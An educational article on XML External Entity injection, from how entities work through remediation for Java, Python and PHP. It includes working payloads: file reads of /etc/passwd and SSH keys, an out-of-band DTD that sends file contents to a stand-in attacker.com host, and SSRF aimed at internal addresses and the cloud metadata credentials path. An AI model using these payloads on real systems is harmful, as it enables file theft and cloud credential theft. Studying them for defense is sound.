XXE: XML External Entity Injection Explained
XML External Entity injection is a vulnerability class where the danger comes not from attacker-controlled code reaching a dangerous function, but from a feature working exactly as the specification intended. External entities are a legitimate part of the XML standard. The vulnerability is that applications allow untrusted input to control which external resources the parser retrieves.
Understanding XXE requires understanding what XML entities are and why external resolution exists in the first place.
How XML Entities Work
An XML entity is a named shorthand that expands to its declared value when referenced in the document. Internal entities are entirely self-contained:
<?xml version="1.0"?>
<!DOCTYPE config [
<!ENTITY appname "MyApplication">
]>
<config>
<title>&appname; Configuration</title>
</config>
When parsed, &appname; expands to "MyApplication". This is a straightforward text substitution mechanism.
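The substitution can be observed with Python's standard-library xml.etree.ElementTree, which expands internal entities declared in a document's own DTD. This is a minimal sketch; the variable names are illustrative.

```python
import xml.etree.ElementTree as ET

# The internal-entity document from above, held as a string.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE config [
  <!ENTITY appname "MyApplication">
]>
<config>
  <title>&appname; Configuration</title>
</config>"""

root = ET.fromstring(DOCUMENT)

# The parser has already replaced &appname; with its declared value.
title = root.find("title").text
print(title)
```

The application code never sees the entity reference, only the expanded text, which is why entity handling has to be controlled at the parser.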
External entities extend this by pointing the entity declaration at a resource outside the document:
<?xml version="1.0"?>
<!DOCTYPE config [
<!ENTITY disclaimer SYSTEM "file:///legal/disclaimer.txt">
]>
<config>
<footer>&disclaimer;</footer>
</config>
Here, the parser retrieves the contents of /legal/disclaimer.txt and substitutes them wherever &disclaimer; appears. The SYSTEM keyword indicates an external resource, and the URI scheme determines what kind of resource is fetched: file:// for local files, http:// for remote URLs, and, in PHP with the expect extension installed, expect:// for command output.
When an application accepts XML from untrusted sources and processes it with a parser that resolves external entities, the attacker controls what the parser retrieves.
Classic XXE: Reading Local Files
The most direct form of XXE exploits the file:// URI scheme to read files from the server's filesystem.
A vulnerable application might accept XML for data import, configuration uploads, document processing, or SOAP API calls. The attacker submits:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
If the parser resolves external entities and the application returns any parsed value from the <data> element in its response, the contents of /etc/passwd appear in the HTTP response body.
This technique works against files the process has read access to. Common targets:
- /etc/passwd: system user list, confirms the vulnerability and reveals usernames
- /etc/hosts: internal network hostnames and IP addresses
- ~/.ssh/id_rsa: SSH private keys for the user running the application
- Application configuration files at known paths: database credentials, API keys, connection strings
- /proc/self/environ: environment variables including secrets passed at process start
- Cloud instance metadata at http://169.254.169.254/: identity credentials, IAM roles
The constraint is that file contents must be syntactically valid when substituted into the XML document. A file containing XML-special characters (<, >, &) will break the document structure and may cause a parse error before the contents can be read. This is addressed using CDATA sections or by reading the file indirectly through a crafted DTD.
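To see what the classic payload asks a parser to do without letting anything be fetched, the declarations can be listed with Python's low-level expat binding. This is a sketch under stated assumptions: list_external_entities is a hypothetical helper name, and it relies on the fact that expat only reports declarations when no external entity handler is installed.

```python
import xml.parsers.expat


def list_external_entities(xml_bytes):
    """Return (name, system_id, is_parameter) for every external entity declared.

    Nothing is retrieved: no ExternalEntityRefHandler is installed, so expat
    reports the declarations and skips the references.
    """
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # External entities carry a system identifier instead of a literal value.
        if system_id is not None:
            found.append((name, system_id, bool(is_parameter)))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return found


PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>"""

print(list_external_entities(PAYLOAD))
```

A listing like this is useful for triaging captured requests: any system identifier in untrusted input is a resource the sender wanted the server to open.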
Blind XXE: Out-of-Band Exfiltration
Many applications process XML without reflecting the parsed content in any response. They return a status code, a generic confirmation, or an entirely separate data structure. The parser resolves entities but the entity values never appear in the output the attacker can observe.
This is blind XXE. The application is vulnerable, but direct reading is not possible. Instead, the attacker redirects the retrieved content to an external destination they control.
Parameter Entities and Out-of-Band DTDs
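A general entity cannot be used to build another declaration: a general entity reference is not expanded inside the system identifier of a second entity, so file contents read through one cannot be spliced into a URL inline. Parameter entities, declared with % and usable only within the DTD, are expanded while the DTD itself is being parsed and can therefore assemble new declarations. The XML specification permits parameter entity references inside a markup declaration only in the external subset, which is why the chain is delivered as a separately hosted DTD rather than written inline.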
An attacker hosts an external DTD file on their own server:
<!-- attacker.com/evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;
The attack payload instructs the vulnerable parser to load this external DTD:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>
<foo>trigger</foo>
When the parser processes this document, it fetches the external DTD, which defines a chain of parameter entities. The chain reads the target file and constructs an HTTP request to the attacker's server with the file contents appended to the URL's query string. The attacker's server receives the DNS lookup and HTTP request, logging the exfiltrated data even though the vulnerable application's HTTP response reveals nothing. Because the contents are not URL-encoded, files containing newlines or other characters that are invalid in a URL can cause the request to fail on some parsers.
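The expansion order is easier to follow when mimicked with plain string substitution. The sketch below is a simulation, not a parser: the expand helper and the sample file contents are hypothetical, and the inner percent sign is written as the character reference &#x25;, which well-formed XML requires inside an entity value.

```python
import re


def expand(text, params):
    """Replace each %name; reference with its value from params (single pass)."""
    return re.sub(r"%(\w+);", lambda match: params[match.group(1)], text)


# Step 1: %file; resolves to the contents of the target file (sample data here).
params = {"file": "root:x:0:0"}

# Step 2: the literal value of %exfil; as it would be written in the hosted DTD.
exfil_literal = "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>"

# Step 3: declaring %exfil; substitutes %file; and turns &#x25; into "%",
# leaving a brand-new declaration for %send; that carries the file contents.
exfil_value = expand(exfil_literal, params).replace("&#x25;", "%")
print(exfil_value)
```

Referencing %exfil; then injects that declaration into the DTD, and referencing %send; makes the parser request the URL.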
DNS-Only Blind XXE
When outbound HTTP connections from the server are blocked but DNS is permitted, even a single DNS lookup confirms exploitability. Pointing an external entity at http://uniqueid.attacker.com/ causes the vulnerable parser to perform a DNS resolution for that subdomain. Observing the DNS lookup on the attacker's nameserver confirms that external entity resolution is occurring.
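During an authorized test, giving every probe its own subdomain makes it possible to tell which request produced which lookup. A minimal sketch follows; dns_probe is a hypothetical helper, and attacker.com stands in for a domain whose nameserver the tester controls.

```python
import uuid


def dns_probe(callback_domain):
    """Return (token, payload): an XML probe whose entity targets a unique subdomain."""
    token = uuid.uuid4().hex
    payload = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY probe SYSTEM "http://{token}.{callback_domain}/">\n'
        "]>\n"
        "<foo>&probe;</foo>"
    )
    return token, payload


token, payload = dns_probe("attacker.com")
print(payload)
```

Recording the token next to the endpoint and parameter it was sent to lets a later DNS log entry be traced back to the exact injection point.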
XXE for Server-Side Request Forgery
External entity URIs are not limited to file://. The http:// scheme causes the parser to make an HTTP request to the specified URL. When that URL points to internal network addresses rather than external domains, this becomes server-side request forgery originating from the server's internal network position.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">
]>
<root>&ssrf;</root>
The parser makes an HTTP request to 192.168.1.1/admin from the server's perspective. The response content may appear in the application's output or trigger different application behavior depending on the response received.
This provides access to:
- Internal administrative interfaces not exposed to the internet
- Cloud provider metadata services (169.254.169.254)
- Services bound to localhost that trust internal traffic
- Other microservices on the same network segment that do not authenticate requests from internal addresses
XXE-based SSRF is particularly effective in cloud environments where the instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns temporary IAM credentials that grant cloud API access.
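When reviewing captured payloads or parser logs, it helps to label each system identifier by where a resolving parser would have sent the request. The sketch below uses Python's ipaddress module; classify_target and its labels are hypothetical, and hostnames are deliberately left unresolved.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_target(system_id):
    """Label a system identifier by the kind of destination it points at."""
    parts = urlsplit(system_id)
    if parts.scheme == "file":
        return "local file"
    host = parts.hostname
    if host is None:
        return "unknown"
    if host == "localhost":
        return "loopback"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: it may still resolve to an internal address.
        return "hostname (resolve before judging)"
    if address.is_loopback:
        return "loopback"
    if address.is_link_local:
        return "link-local (cloud metadata range)"
    if address.is_private:
        return "private network"
    return "public address"


for target in ("http://192.168.1.1/admin",
               "http://169.254.169.254/latest/meta-data/",
               "file:///etc/passwd"):
    print(target, "->", classify_target(target))
```

The link-local check runs before the private check because 169.254.0.0/16 also counts as private in the ipaddress module, and the metadata range deserves its own label.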
Finding XXE Injection Points
Any endpoint that accepts XML is a potential XXE target. The attack surface is wider than most developers expect.
Obvious XML endpoints: SOAP web services, XML-RPC, document processors (DOCX, XLSX, SVG), RSS/Atom feed parsers, and configuration upload forms. These accept XML by design and are frequently tested.
Less obvious XML endpoints: Content-type header manipulation can reveal XML parsers behind JSON-looking interfaces. Changing Content-Type: application/json to Content-Type: application/xml and submitting an XML equivalent of the original request sometimes reveals XML parsers that process both formats.
File upload endpoints: DOCX, XLSX, and PPTX files are ZIP archives containing XML, and an SVG file is itself XML. Uploading a crafted SVG or Office document with external entity declarations to endpoints that process these formats may trigger XXE in the document processing library. This is a common finding in applications that accept user-uploaded documents and render or summarize them server-side.
Indirect XML consumers: Libraries used for serialization, configuration loading, and template processing sometimes consume XML internally. A library deserializing an object from XML using an attacker-influenced input path can be vulnerable without the developer being aware that XML is processed.
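For the ZIP-based formats mentioned above, one way to screen an upload is to check each XML part for a DOCTYPE declaration before handing the file to a document library; legitimate Office parts do not normally need one. This is a sketch only: the helper names are hypothetical, the part-name filter is a simplifying assumption, and a production check would also cap archive and member sizes.

```python
import io
import zipfile
import xml.parsers.expat


class DoctypeFound(Exception):
    """Raised as soon as a DOCTYPE declaration is encountered."""


def has_doctype(xml_bytes):
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeFound(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except DoctypeFound:
        return True
    except xml.parsers.expat.ExpatError:
        return False  # not well-formed; reject or report separately
    return False


def parts_with_doctype(archive_bytes):
    """Return the names of XML parts in a ZIP-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels")) and has_doctype(archive.read(name)):
                flagged.append(name)
    return flagged


# Build a tiny stand-in archive with one clean part and one crafted part.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as sample:
    sample.writestr("[Content_Types].xml", "<Types/>")
    sample.writestr(
        "word/document.xml",
        '<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>',
    )

print(parts_with_doctype(buffer.getvalue()))
```

The check stops at the DOCTYPE, before any entity is declared or referenced, so the screening step itself cannot be used to trigger resolution.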
When testing a suspected endpoint:
- Submit a basic XXE payload and observe whether the response changes in timing, content, or error messaging
- Point the external entity at a URL you control and watch for DNS or HTTP callbacks
- If callbacks arrive, proceed with file read or SSRF payloads
- If no callbacks arrive, the parser likely has external entity resolution disabled, or outbound DNS and HTTP from the server are blocked
The Impact of Poorly Configured Parsers
The severity of XXE depends on what the vulnerable application can access and what it returns.
A public-facing application that runs with limited filesystem permissions but reflects entity values in error messages can still expose application configuration files containing database credentials: a direct path from low-severity file disclosure to full database access.
An internal tool running with elevated permissions on a network with access to cloud metadata services turns an XXE vulnerability into AWS, GCP, or Azure credential theft, granting cloud API access that may far exceed what the application itself was intended to provide.
The vulnerability is the external entity resolution. The impact is a function of the environment.
Remediation
Disable External Entity Processing
The correct fix is to configure the XML parser to refuse to process external entities and external DTDs before any input reaches it. This is a parser configuration change, not an input validation rule.
Java (DocumentBuilderFactory):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
Java (XMLInputFactory for StAX parsers):
XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
Python:
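Use the defusedxml library instead of the standard library's xml.etree.ElementTree. With its default settings it rejects documents that declare entities or reference external resources. The defusedxml.lxml module is deprecated, so for lxml configure the parser directly with resolve_entities=False and no_network=True.
import defusedxml.ElementTree as ET
tree = ET.parse(xml_file)  # Raises an exception if the document declares entities
PHP: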
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true); // deprecated as of PHP 8.0
}
// PHP 8.0+ disables external entity loading by default
$doc = new DOMDocument();
// Do not pass LIBXML_NOENT or LIBXML_DTDLOAD here; LIBXML_NONET additionally blocks network access.
$doc->loadXML($xml, LIBXML_NONET);
In PHP 8.0 and later, external entity loading is disabled by default, but explicitly passing LIBXML_NOENT to loadXML() turns entity substitution back on, a common accidental reintroduction.
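Back on the Python side, services that cannot take defusedxml as a dependency can at least state the intended configuration explicitly on the standard-library SAX parser. The sketch below is an assumption-laden example, not a replacement for defusedxml: TextCollector and parse_without_external_entities are hypothetical names, and this configuration does nothing about entity expansion bombs.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Collects all character data seen in the document."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(xml_bytes):
    parser = xml.sax.make_parser()
    # Explicitly refuse external general and parameter entities,
    # rather than relying on the interpreter's default.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


PAYLOAD = b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>before &x; after</r>'
print(repr(parse_without_external_entities(PAYLOAD)))
```

Setting the features in code keeps the behavior stable across interpreter versions and makes the security decision visible in review.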
Use Safer Data Formats
If the endpoint does not specifically require XML, replace it with JSON. JSON parsers do not have a concept of external references. There are no entity declarations, no DTDs, no external resource resolution. The entire vulnerability class is eliminated.
For internal services where format choice is flexible, this is the preferred approach.
Validate XML Schema Without Entity Resolution
If XML is required, validate documents against a strict schema after disabling external entity processing. Schema validation cannot substitute for disabling external entities — validation occurs after parsing, and parsing with external entities enabled is when the damage occurs. The order matters: disable external entity resolution first, then validate structure.
Why Filtering Does Not Work
A common remediation attempt is to filter the input for DOCTYPE declarations or the SYSTEM keyword. This is insufficient. The same document can be submitted in another encoding, such as UTF-16, so a byte-level search for the ASCII strings never matches. External entities can also be declared with the PUBLIC keyword instead of SYSTEM, and a filter has to agree exactly with the parser on whitespace, comments, and the encoding named in the XML declaration.
The vulnerability is not in the document's content reaching application code. It is in the parser executing the XML specification's external entity feature. Only disabling that feature in the parser prevents the vulnerability. Filtering what reaches the parser is an arms race that defenders reliably lose against a sufficiently motivated attacker.
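The encoding problem is easy to reproduce. In the sketch below, naive_filter_allows is a hypothetical byte-level filter of the kind described above, and the document uses only a harmless internal entity so that the effect is visible without touching any external resource.

```python
import xml.etree.ElementTree as ET


def naive_filter_allows(xml_bytes):
    """Hypothetical filter: reject input containing DOCTYPE or SYSTEM as ASCII bytes."""
    upper = xml_bytes.upper()
    return b"<!DOCTYPE" not in upper and b"SYSTEM" not in upper


document = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<!DOCTYPE r [<!ENTITY marker "entity expanded">]>'
    "<r>&marker;</r>"
)
# UTF-16 stores each character in two bytes, so the ASCII pattern never appears.
encoded = document.encode("utf-16")

filter_passed = naive_filter_allows(encoded)
parsed_text = ET.fromstring(encoded).text
print(filter_passed, parsed_text)
```

The filter sees no DOCTYPE, yet the parser detects the encoding, processes the DTD, and expands the entity. The two components disagree about what the bytes mean, and the parser's interpretation is the one that matters.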